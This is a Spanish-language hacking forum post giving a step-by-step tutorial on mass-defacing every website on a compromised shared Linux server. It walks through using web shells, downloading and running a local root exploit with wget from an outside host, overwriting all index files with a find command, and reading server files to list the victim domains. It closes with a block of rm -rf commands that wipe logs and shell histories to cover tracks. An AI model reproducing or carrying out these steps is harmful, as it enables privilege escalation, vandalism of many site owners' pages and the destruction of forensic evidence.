Sign in to follow this  
rehizner

Realizar un Mass Defacement en Linux

1 post in this topic

Lo primero es conseguir acceso a un servidor web que contenga mas sitios web adentro.

 

si el acceso que conseguiste es por medio de una web shell ( c99, r57 etc ) o por shell de sistema da igual.

 

ahora deberas conseguir permisos de root, ni pienses en cranearte creando un local root exploit por que se requiere gran experiencia en programacion, conocimiento de assembler entre otras cosas y si los tuvieras no estarias leyendo este paper xD, asi que deberas conseguirte un local root exploit para obtener los privilegios que necesitas, puedes obtenerlos de esta web http://tarantula.by.ru/localroot/ .

 

Ahora para saber que version de kernel es bastara con ejecutar un uname:

 

uname -a

te respondera con algo como esto:

Linux vtux.goahosting.com 2.6.9-023stab043.1-smp #1 SMP Mon Mar 5 16:35:19 MSK 2007 i686 i686 i386 GNU/Linux

Entonces en ese caso ya sabes que la version del kernel es la 2.6.9

 

ahora deberas subir el LRE correspondiente a esa version y ejecutarlo

 

Si estas usando una webshell usa el uploader que te facilita, si estas a traves de una shell de sistema tendras que usar el metodo wget:

 

wget tarantula.by.ru/localroot/2.6.9/krad

ahi lo subiste a la carpeta en la que te encontrabas al momento de ejecutar el comando ahora deberas brindarle permisos para ejecutarlo:

 

chmod 777 krad

y despues ejecutarlo

 

./krad

deberas esperar hasta que el LRE haga lo suyo...

 

 

para saber si obtuviste los permisos de root ejecuta un id:

 

id

si te responde con algo como:

 

uid=99(nobody) gid=99(nobody) groups=99(nobody)

estas cagado en cambio si te responde con algo como:

 

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)

puedes estar feliz xD.

 

ahora procedamos a reemplazar todos los index o home o main o etc, que se encuentren en el servidor.

 

Sube tu index ya sea a traves del uploader de la webshell que estas usando o con el wget

 

con wget seria algo asi:

 

wget miweb.com/miindex.htm

Ahora ejecuta el comando que enviara tu index al directorio donde se encuentran los index de las victimas:

 

find / -name "index.*" -exec cp /tmp/miindex.htm {} \;

recuerda cambiar el tmp por la ruta donde subiste tu index.

 

Ahora deberas saber cuales fueron las web que modificaste.

 

Ahi distintos metodos ya que no todos los servidores web estan configurados de la misma manera, estos son los que conozco:

 

1. Encontrando el o los httpd.conf :

 

find / -name httpd.conf

2. Leyendo los ficheros userdomains y trueuserdomains :

 

cat /etc/userdomains

o

 

cat /etc/trueuserdomains

3. realizar un ls a /usr/local/frontpage:

 

ls /usr/local/frontpage/

4. Este es uno que descubri de hace poco y haciendo un ls a el directorio /var/named :

 

ls /var/named

 

Ahora si no lograron obtener permisos de root debido a que el kernel es muy nuevo o esta parchado pueden intenter acceder a las carpetas publicas de las webs hospedadas en el servidor.

 

para eso deberan primero conocer las cuentas que tiene el servidor haciendo un ls al directorio mail:

 

ls /var/spool/mail

o

 

ls /var/mail

Ahora que saben cuales son las cuentas que hay en el servidor tendran que reemplazar la cuenta en la que estan por la que quieren acceder, ejemplo:

 

estan en /home/luis/public_html

 

y en el directorio mail leyeron que existia una cuenta llamada pedro reemplazen luis por pedro y ya tendran acceso a lo que esta en esa otra cuenta siempre y cuando la carpeta public_html tenga permisos de lectura.

 

 

Generalmente el nombre de la cuenta es semejante a la del dominio asi que solo deben comparar los nombres con los que encontraron en /var/named/ .

 

Ahora para finalizar el ataque ahi que borrar los logs:

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout 
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

eso lo pueden ejecutar uno por uno o guardarlo con cualquier nombre , darle permisos y ejecutarlo:

 

chmod 777 borrarlogs
./borrarlogs

y recuerden que aunq tengan permisos de solo lectura ahi veces en las que podran igual desfigurar un sitio web, leyendo ficheros de configuracion , entrando en la base de datos y desde ahi desfigurar.

 

Eso es todo cualquier duda pregunten.

 

ByteZ

 

By rehizner.

Share this post


Link to post
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this